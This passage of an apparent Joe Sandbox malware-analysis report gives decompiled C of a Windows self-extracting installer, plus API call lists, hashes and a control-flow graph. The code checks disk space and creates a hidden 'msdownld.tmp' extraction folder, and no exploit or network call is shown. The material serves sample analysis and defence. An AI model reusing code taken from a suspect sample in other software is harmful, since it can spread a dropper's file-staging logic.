                                                                                                                                                                                                                                              									_t109 = 0xa891e4;
                                                                                                                                                                                                                                              									_t40 = GetTempPathA(0x104, 0xa891e4);
                                                                                                                                                                                                                                              									__eflags = _t40;
                                                                                                                                                                                                                                              									if(_t40 == 0) {
                                                                                                                                                                                                                                              										L19:
                                                                                                                                                                                                                                              										_push(_t82);
                                                                                                                                                                                                                                              										E00A81781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                              										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                              										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                              											do {
                                                                                                                                                                                                                                              												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                              												__eflags = _t109 - 6;
                                                                                                                                                                                                                                              												if(_t109 == 6) {
                                                                                                                                                                                                                                              													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00A86952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E00A8597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00A82630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E00A8658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0xa891e4;
																					E00A81781(0xa891e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00A85467(0xa891e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00A82630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E00A8597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00A85467(0xa891e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0xa891e4;
											_t70 = E00A82630(0, 0xa891e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0xa891e4;
												_t71 = E00A85467(0xa891e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                              														_push(4);
                                                                                                                                                                                                                                              														_t101 = 3;
                                                                                                                                                                                                                                              														_t82 =  &_v268;
                                                                                                                                                                                                                                              														_t44 = E00A8597D(_t82, _t101, 1);
                                                                                                                                                                                                                                              														__eflags = _t44;
                                                                                                                                                                                                                                              													} while (_t44 != 0);
                                                                                                                                                                                                                                              													goto L2;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                              							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                              								L10:
                                                                                                                                                                                                                                              								_t72 = 1;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								__eflags =  *0xa88b3f - _t35; // 0x0
                                                                                                                                                                                                                                              								_t72 = 0;
                                                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                                                              									goto L10;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t101 = 0;
                                                                                                                                                                                                                                              							_t73 = E00A85467(0xa88b3e, 0, _t72);
                                                                                                                                                                                                                                              							__eflags = _t73;
                                                                                                                                                                                                                                              							if(_t73 != 0) {
                                                                                                                                                                                                                                              								L45:
                                                                                                                                                                                                                                              								_t38 = 1;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t101 = 0x4be;
                                                                                                                                                                                                                                              								E00A844B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              								goto L2;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t101 = 0x4b1;
                                                                                                                                                                                                                                              						E00A844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						LocalFree(_t109);
                                                                                                                                                                                                                                              						 *0xa89124 = 0x80070714;
                                                                                                                                                                                                                                              						goto L2;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t101 = 0x4b5;
                                                                                                                                                                                                                                              					E00A844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                                                              					_t38 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				L47:
                                                                                                                                                                                                                                              				return E00A86CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                              			}





































                                                                                                                                                                                                                                              0x00a8575b
                                                                                                                                                                                                                                              0x00a85760
                                                                                                                                                                                                                                              0x00a85762
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85764
                                                                                                                                                                                                                                              0x00a85764
                                                                                                                                                                                                                                              0x00a85769
                                                                                                                                                                                                                                              0x00a8577e
                                                                                                                                                                                                                                              0x00a8577e
                                                                                                                                                                                                                                              0x00a85781
                                                                                                                                                                                                                                              0x00a85788
                                                                                                                                                                                                                                              0x00a8578d
                                                                                                                                                                                                                                              0x00a8578f
                                                                                                                                                                                                                                              0x00a857b2
                                                                                                                                                                                                                                              0x00a857b8
                                                                                                                                                                                                                                              0x00a857bd
                                                                                                                                                                                                                                              0x00a857bf
                                                                                                                                                                                                                                              0x00a857cd
                                                                                                                                                                                                                                              0x00a857cd
                                                                                                                                                                                                                                              0x00a857dd
                                                                                                                                                                                                                                              0x00a857e3
                                                                                                                                                                                                                                              0x00a857ef
                                                                                                                                                                                                                                              0x00a857f5
                                                                                                                                                                                                                                              0x00a857f8
                                                                                                                                                                                                                                              0x00a8580a
                                                                                                                                                                                                                                              0x00a8580a
                                                                                                                                                                                                                                              0x00a857fa
                                                                                                                                                                                                                                              0x00a85802
                                                                                                                                                                                                                                              0x00a85802
                                                                                                                                                                                                                                              0x00a8580d
                                                                                                                                                                                                                                              0x00a8580f
                                                                                                                                                                                                                                              0x00a85830
                                                                                                                                                                                                                                              0x00a85836
                                                                                                                                                                                                                                              0x00a8583d
                                                                                                                                                                                                                                              0x00a8584b
                                                                                                                                                                                                                                              0x00a85851
                                                                                                                                                                                                                                              0x00a85855
                                                                                                                                                                                                                                              0x00a8585a
                                                                                                                                                                                                                                              0x00a8585c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8585e
                                                                                                                                                                                                                                              0x00a8585e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8585e
                                                                                                                                                                                                                                              0x00a85811
                                                                                                                                                                                                                                              0x00a85817
                                                                                                                                                                                                                                              0x00a85819
                                                                                                                                                                                                                                              0x00a8581f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8581f
                                                                                                                                                                                                                                              0x00a85791
                                                                                                                                                                                                                                              0x00a85797
                                                                                                                                                                                                                                              0x00a8579c
                                                                                                                                                                                                                                              0x00a8579e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a857a0
                                                                                                                                                                                                                                              0x00a857a9
                                                                                                                                                                                                                                              0x00a857ae
                                                                                                                                                                                                                                              0x00a857b0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a857b0
                                                                                                                                                                                                                                              0x00a8579e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85769
                                                                                                                                                                                                                                              0x00a85762
                                                                                                                                                                                                                                              0x00a85753
                                                                                                                                                                                                                                              0x00a8574f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8572e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85864
                                                                                                                                                                                                                                              0x00a85864
                                                                                                                                                                                                                                              0x00a85864
                                                                                                                                                                                                                                              0x00a85717
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a856c3
                                                                                                                                                                                                                                              0x00a856c5
                                                                                                                                                                                                                                              0x00a856c9
                                                                                                                                                                                                                                              0x00a856ce
                                                                                                                                                                                                                                              0x00a856d0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a856d6
                                                                                                                                                                                                                                              0x00a856d6
                                                                                                                                                                                                                                              0x00a856d8
                                                                                                                                                                                                                                              0x00a856dd
                                                                                                                                                                                                                                              0x00a856df
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a856e1
                                                                                                                                                                                                                                              0x00a856e2
                                                                                                                                                                                                                                              0x00a856e4
                                                                                                                                                                                                                                              0x00a856e6
                                                                                                                                                                                                                                              0x00a856eb
                                                                                                                                                                                                                                              0x00a856ed
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a856f3
                                                                                                                                                                                                                                              0x00a856f3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8586c
                                                                                                                                                                                                                                              0x00a85878
                                                                                                                                                                                                                                              0x00a8587e
                                                                                                                                                                                                                                              0x00a85882
                                                                                                                                                                                                                                              0x00a85883
                                                                                                                                                                                                                                              0x00a85889
                                                                                                                                                                                                                                              0x00a8588e
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846A0
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: SizeofResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846A9
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846C3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LoadResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846CC
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LockResource.KERNEL32(00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846D3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: memcpy_s.MSVCRT ref: 00A846E5
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00A855CF
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00A85638
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 00A8564C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A85620
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                                • Part of subcall function 00A86285: GetLastError.KERNEL32(00A85BBC), ref: 00A86285
                                                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A856B9
                                                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00A8571E
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00A85737
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00A857CD
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00A857EF
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00A85802
                                                                                                                                                                                                                                                • Part of subcall function 00A82630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00A82654
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00A85830
                                                                                                                                                                                                                                                • Part of subcall function 00A86517: FindResourceA.KERNEL32(00A80000,000007D6,00000005), ref: 00A8652A
                                                                                                                                                                                                                                                • Part of subcall function 00A86517: LoadResource.KERNEL32(00A80000,00000000,?,?,00A82EE8,00000000,00A819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A86538
                                                                                                                                                                                                                                                • Part of subcall function 00A86517: DialogBoxIndirectParamA.USER32(00A80000,00000000,00000547,00A819E0,00000000), ref: 00A86557
                                                                                                                                                                                                                                                • Part of subcall function 00A86517: FreeResource.KERNEL32(00000000,?,?,00A82EE8,00000000,00A819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A86560
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00A85878
                                                                                                                                                                                                                                                • Part of subcall function 00A8597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A859A8
                                                                                                                                                                                                                                                • Part of subcall function 00A8597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00A859AF
                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                              • API String ID: 2436801531-2610921595
                                                                                                                                                                                                                                              • Opcode ID: 1f6f0516f16dcf53755823739df435335ba5555f23358bb6885847770d2752b1
                                                                                                                                                                                                                                              • Instruction ID: e765b586cefe4e66154880dc499cf66c3b7f7ca6122c3feb16d3427229257ab7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f6f0516f16dcf53755823739df435335ba5555f23358bb6885847770d2752b1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1812570E04A059BEB24BBB08D85BFE76ADAF60340F5404A6FD86D2191EF748DC28B50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              control_flow_graph 324 a8597d-a859b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 a859bb-a859d8 call a844b9 call a86285 324->325 326 a859dd-a85a1b GetDiskFreeSpaceA 324->326 343 a85c05-a85c14 call a86ce0 325->343 328 a85ba1-a85bde memset call a86285 GetLastError FormatMessageA 326->328 329 a85a21-a85a4a MulDiv 326->329 339 a85be3-a85bfc call a844b9 SetCurrentDirectoryA 328->339 329->328 332 a85a50-a85a6c GetVolumeInformationA 329->332 335 a85a6e-a85ab0 memset call a86285 GetLastError FormatMessageA 332->335 336 a85ab5-a85aca SetCurrentDirectoryA 332->336 335->339 337 a85acc-a85ad1 336->337 341 a85ae2-a85ae4 337->341 342 a85ad3-a85ad8 337->342 351 a85c02 339->351 349 a85ae6 341->349 350 a85ae7-a85af8 341->350 342->341 347 a85ada-a85ae0 342->347 347->337 347->341 349->350 353 a85af9-a85afb 350->353 354 a85c04 351->354 355 a85afd-a85b03 353->355 356 a85b05-a85b08 353->356 354->343 355->353 355->356 357 a85b0a-a85b1b call a844b9 356->357 358 a85b20-a85b27 356->358 357->351 360 a85b29-a85b33 358->360 361 a85b52-a85b5b 358->361 360->361 364 a85b35-a85b50 360->364 362 a85b62-a85b6d 361->362 365 a85b6f-a85b74 362->365 366 a85b76-a85b7d 362->366 364->362 367 a85b85 365->367 368 a85b7f-a85b81 366->368 369 a85b83 366->369 370 a85b96-a85b9f 367->370 371 a85b87-a85b94 call a8268b 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                                                                                              			E00A8597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                                                              				char _v788;
                                                                                                                                                                                                                                              				long _v792;
                                                                                                                                                                                                                                              				long _v796;
                                                                                                                                                                                                                                              				long _v800;
                                                                                                                                                                                                                                              				signed int _v804;
                                                                                                                                                                                                                                              				long _v808;
                                                                                                                                                                                                                                              				int _v812;
                                                                                                                                                                                                                                              				long _v816;
                                                                                                                                                                                                                                              				long _v820;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                                                                              				int _t50;
                                                                                                                                                                                                                                              				signed int _t55;
                                                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                                                              				int _t69;
                                                                                                                                                                                                                                              				signed int _t73;
                                                                                                                                                                                                                                              				signed short _t78;
                                                                                                                                                                                                                                              				signed int _t87;
                                                                                                                                                                                                                                              				signed int _t101;
                                                                                                                                                                                                                                              				int _t102;
                                                                                                                                                                                                                                              				unsigned int _t103;
                                                                                                                                                                                                                                              				unsigned int _t105;
                                                                                                                                                                                                                                              				signed int _t111;
                                                                                                                                                                                                                                              				long _t112;
                                                                                                                                                                                                                                              				signed int _t116;
                                                                                                                                                                                                                                              				CHAR* _t118;
                                                                                                                                                                                                                                              				signed int _t119;
                                                                                                                                                                                                                                              				signed int _t120;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t114 = __edi;
                                                                                                                                                                                                                                              				_t46 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                              				_v804 = __edx;
                                                                                                                                                                                                                                              				_t118 = __ecx;
                                                                                                                                                                                                                                              				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                              				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                              				if(_t50 != 0) {
                                                                                                                                                                                                                                              					_push(__edi);
                                                                                                                                                                                                                                              					_v796 = 0;
                                                                                                                                                                                                                                              					_v792 = 0;
                                                                                                                                                                                                                                              					_v800 = 0;
                                                                                                                                                                                                                                              					_v808 = 0;
                                                                                                                                                                                                                                              					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                              					__eflags = _t55;
                                                                                                                                                                                                                                              					if(_t55 == 0) {
                                                                                                                                                                                                                                              						L29:
                                                                                                                                                                                                                                              						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                              						 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                              						_t110 = 0x4b0;
                                                                                                                                                                                                                                              						L30:
                                                                                                                                                                                                                                              						__eflags = 0;
                                                                                                                                                                                                                                              						E00A844B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                              						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                              						L31:
                                                                                                                                                                                                                                              						_t66 = 0;
                                                                                                                                                                                                                                              						__eflags = 0;
                                                                                                                                                                                                                                              						L32:
                                                                                                                                                                                                                                              						_pop(_t114);
                                                                                                                                                                                                                                              						goto L33;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                              					_v812 = _t69;
                                                                                                                                                                                                                                              					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                              					__eflags = _t116;
                                                                                                                                                                                                                                              					if(_t116 == 0) {
                                                                                                                                                                                                                                              						goto L29;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                              					__eflags = _t73;
                                                                                                                                                                                                                                              					if(_t73 != 0) {
                                                                                                                                                                                                                                              						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                              						_t101 =  &_v16;
                                                                                                                                                                                                                                              						_t111 = 6;
                                                                                                                                                                                                                                              						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                              						__eflags = _t119;
                                                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                                                              							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                              							__eflags = _t22;
                                                                                                                                                                                                                                              							if(_t22 == 0) {
                                                                                                                                                                                                                                              								break;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                              							__eflags = _t87;
                                                                                                                                                                                                                                              							if(_t87 == 0) {
                                                                                                                                                                                                                                              								break;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							 *_t101 = _t87;
                                                                                                                                                                                                                                              							_t101 = _t101 + 1;
                                                                                                                                                                                                                                              							_t111 = _t111 - 1;
                                                                                                                                                                                                                                              							__eflags = _t111;
                                                                                                                                                                                                                                              							if(_t111 != 0) {
                                                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _t111;
                                                                                                                                                                                                                                              						if(_t111 == 0) {
                                                                                                                                                                                                                                              							_t101 = _t101 - 1;
                                                                                                                                                                                                                                              							__eflags = _t101;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *_t101 = 0;
                                                                                                                                                                                                                                              						_t112 = 0x200;
                                                                                                                                                                                                                                              						_t102 = _v812;
                                                                                                                                                                                                                                              						_t78 = 0;
                                                                                                                                                                                                                                              						_t118 = 8;
                                                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                                                              							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                              							if(_t102 == _t112) {
                                                                                                                                                                                                                                              								break;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                              							_t78 = _t78 + 1;
                                                                                                                                                                                                                                              							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                              							if(_t78 < _t118) {
                                                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                              						if(_t78 != _t118) {
                                                                                                                                                                                                                                              							__eflags =  *0xa89a34 & 0x00000008;
                                                                                                                                                                                                                                              							if(( *0xa89a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                              								L20:
                                                                                                                                                                                                                                              								_t103 =  *0xa89a38; // 0x0
                                                                                                                                                                                                                                              								_t110 =  *((intOrPtr*)(0xa889e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                              								L21:
                                                                                                                                                                                                                                              								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                              								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                              									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                              									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								if(__eflags <= 0) {
                                                                                                                                                                                                                                              									 *0xa89124 = 0;
                                                                                                                                                                                                                                              									_t66 = 1;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t66 = E00A8268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                              							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t105 =  *0xa89a38; // 0x0
                                                                                                                                                                                                                                              							_t110 =  *((intOrPtr*)(0xa889e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xa889e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                              							_t103 = (_t105 >> 2) +  *0xa89a38;
                                                                                                                                                                                                                                              							goto L21;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t110 = 0x4c5;
                                                                                                                                                                                                                                              						E00A844B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						goto L31;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                              					 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                              					_t110 = 0x4f9;
                                                                                                                                                                                                                                              					goto L30;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t110 = 0x4bc;
                                                                                                                                                                                                                                              					E00A844B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              					_t66 = 0;
                                                                                                                                                                                                                                              					L33:
                                                                                                                                                                                                                                              					return E00A86CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}



































                                                                                                                                                                                                                                              0x00a85b52
                                                                                                                                                                                                                                              0x00a85b5b
                                                                                                                                                                                                                                              0x00a85b62
                                                                                                                                                                                                                                              0x00a85b6b
                                                                                                                                                                                                                                              0x00a85b6d
                                                                                                                                                                                                                                              0x00a85b76
                                                                                                                                                                                                                                              0x00a85b7d
                                                                                                                                                                                                                                              0x00a85b83
                                                                                                                                                                                                                                              0x00a85b7f
                                                                                                                                                                                                                                              0x00a85b7f
                                                                                                                                                                                                                                              0x00a85b7f
                                                                                                                                                                                                                                              0x00a85b6f
                                                                                                                                                                                                                                              0x00a85b72
                                                                                                                                                                                                                                              0x00a85b72
                                                                                                                                                                                                                                              0x00a85b85
